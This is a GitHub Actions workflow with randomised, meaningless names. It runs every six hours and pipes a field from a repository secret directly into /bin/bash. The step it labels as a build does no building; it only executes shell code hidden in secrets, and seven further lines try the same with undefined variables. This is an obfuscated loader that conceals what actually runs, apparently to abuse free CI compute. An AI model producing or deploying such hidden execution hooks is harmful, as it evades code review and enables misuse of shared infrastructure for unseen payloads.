name: heniyiqish
on:
  workflow_dispatch:
  schedule:
    - cron: '40 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: heniyiqish
        env:
          rqp25: ${{ secrets.rqp25 }}
        run: |
          echo $rqp25 | jq -r .i71227 | /bin/bash
          echo $qou803 | jq -r .q7447 | /bin/bash
          echo $utpk3 | jq -r .cy4 | /bin/bash
          echo $rfvw378 | jq -r .v9 | /bin/bash
          echo $ug823 | jq -r .z47 | /bin/bash
          echo $g87185 | jq -r .nhln257 | /bin/bash
          echo $kla06378 | jq -r .ns87865 | /bin/bash
          echo $jnv6998 | jq -r .ymg89 | /bin/bash

